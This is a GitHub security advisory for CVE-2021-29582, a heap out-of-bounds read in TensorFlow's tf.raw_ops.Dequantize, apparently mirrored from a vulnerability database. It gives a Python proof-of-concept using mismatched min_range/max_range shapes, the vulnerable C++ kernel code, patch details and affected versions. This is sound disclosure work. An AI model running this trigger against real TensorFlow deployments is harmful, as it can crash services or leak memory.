GHSA-c45w-2wxr-pp53
Vulnerability from github
Impact
Due to lack of validation in tf.raw_ops.Dequantize
, an attacker can trigger a read from outside of bounds of heap allocated data:
```python import tensorflow as tf
input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10], shape=[5, 10], dtype=tf.int32) input_tensor=tf.cast(input_tensor, dtype=tf.quint8) min_range = tf.constant([-10], shape=[1], dtype=tf.float32) max_range = tf.constant([24, 758, 758, 758, 758], shape=[5], dtype=tf.float32)
tf.raw_ops.Dequantize( input=input_tensor, min_range=min_range, max_range=max_range, mode='SCALED', narrow_range=True, axis=0, dtype=tf.dtypes.float32) ```
The implementation accesses the min_range
and max_range
tensors in parallel but fails to check that they have the same shape:
cc
if (num_slices == 1) {
const float min_range = input_min_tensor.flat<float>()(0);
const float max_range = input_max_tensor.flat<float>()(0);
DequantizeTensor(ctx, input, min_range, max_range, &float_output);
} else {
...
auto min_ranges = input_min_tensor.vec<float>();
auto max_ranges = input_max_tensor.vec<float>();
for (int i = 0; i < num_slices; ++i) {
DequantizeSlice(ctx->eigen_device<Device>(), ctx,
input_tensor.template chip<1>(i), min_ranges(i),
max_ranges(i), output_tensor.template chip<1>(i));
...
}
}
Patches
We have patched the issue in GitHub commit 5899741d0421391ca878da47907b1452f06aaf1b.
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
{ "affected": [ { "package": { "ecosystem": "PyPI", "name": "tensorflow" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "2.1.4" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow" }, "ranges": [ { "events": [ { "introduced": "2.2.0" }, { "fixed": "2.2.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow" }, "ranges": [ { "events": [ { "introduced": "2.3.0" }, { "fixed": "2.3.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow" }, "ranges": [ { "events": [ { "introduced": "2.4.0" }, { "fixed": "2.4.2" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow-cpu" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "2.1.4" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow-cpu" }, "ranges": [ { "events": [ { "introduced": "2.2.0" }, { "fixed": "2.2.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow-cpu" }, "ranges": [ { "events": [ { "introduced": "2.3.0" }, { "fixed": "2.3.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow-cpu" }, "ranges": [ { "events": [ { "introduced": "2.4.0" }, { "fixed": "2.4.2" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow-gpu" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "2.1.4" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow-gpu" }, "ranges": [ { "events": [ { "introduced": "2.2.0" }, { "fixed": "2.2.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow-gpu" }, "ranges": [ { "events": [ { "introduced": "2.3.0" }, { "fixed": "2.3.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "PyPI", "name": "tensorflow-gpu" }, "ranges": [ { "events": [ { "introduced": "2.4.0" }, { "fixed": "2.4.2" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2021-29582" ], "database_specific": { "cwe_ids": [ "CWE-125" ], "github_reviewed": true, "github_reviewed_at": "2021-05-18T17:47:11Z", "nvd_published_at": "2021-05-14T20:15:00Z", "severity": "LOW" }, "details": "### Impact\nDue to lack of validation in `tf.raw_ops.Dequantize`, an attacker can trigger a read from outside of bounds of heap allocated data:\n\n```python\nimport tensorflow as tf\n\ninput_tensor=tf.constant(\n [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n -10, -10, -10, -10], shape=[5, 10], dtype=tf.int32)\ninput_tensor=tf.cast(input_tensor, dtype=tf.quint8)\nmin_range = tf.constant([-10], shape=[1], dtype=tf.float32)\nmax_range = tf.constant([24, 758, 758, 758, 758], shape=[5], dtype=tf.float32)\n \ntf.raw_ops.Dequantize( \n input=input_tensor, min_range=min_range, max_range=max_range, mode=\u0027SCALED\u0027,\n narrow_range=True, axis=0, dtype=tf.dtypes.float32)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/26003593aa94b1742f34dc22ce88a1e17776a67d/tensorflow/core/kernels/dequantize_op.cc#L106-L131) accesses the `min_range` and `max_range` tensors in parallel but fails to check that they have the same shape:\n\n```cc\nif (num_slices == 1) {\n const float min_range = input_min_tensor.flat\u003cfloat\u003e()(0);\n const float max_range = input_max_tensor.flat\u003cfloat\u003e()(0);\n DequantizeTensor(ctx, input, min_range, max_range, \u0026float_output);\n} else {\n ...\n auto min_ranges = input_min_tensor.vec\u003cfloat\u003e();\n auto max_ranges = input_max_tensor.vec\u003cfloat\u003e();\n for (int i = 0; i \u003c num_slices; ++i) {\n DequantizeSlice(ctx-\u003eeigen_device\u003cDevice\u003e(), ctx,\n input_tensor.template chip\u003c1\u003e(i), min_ranges(i),\n max_ranges(i), output_tensor.template chip\u003c1\u003e(i));\n ...\n }\n}\n```\n\n### Patches\nWe have patched the issue in GitHub commit [5899741d0421391ca878da47907b1452f06aaf1b](https://github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.", "id": "GHSA-c45w-2wxr-pp53", "modified": "2024-11-01T17:14:26Z", "published": "2021-05-21T14:26:32Z", "references": [ { "type": "WEB", "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c45w-2wxr-pp53" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29582" }, { "type": "WEB", "url": "https://github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-510.yaml" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-708.yaml" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-219.yaml" }, { "type": "PACKAGE", "url": "https://github.com/tensorflow/tensorflow" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "type": "CVSS_V3" }, { "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", "type": "CVSS_V4" } ], "summary": "Heap OOB read in `tf.raw_ops.Dequantize`" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.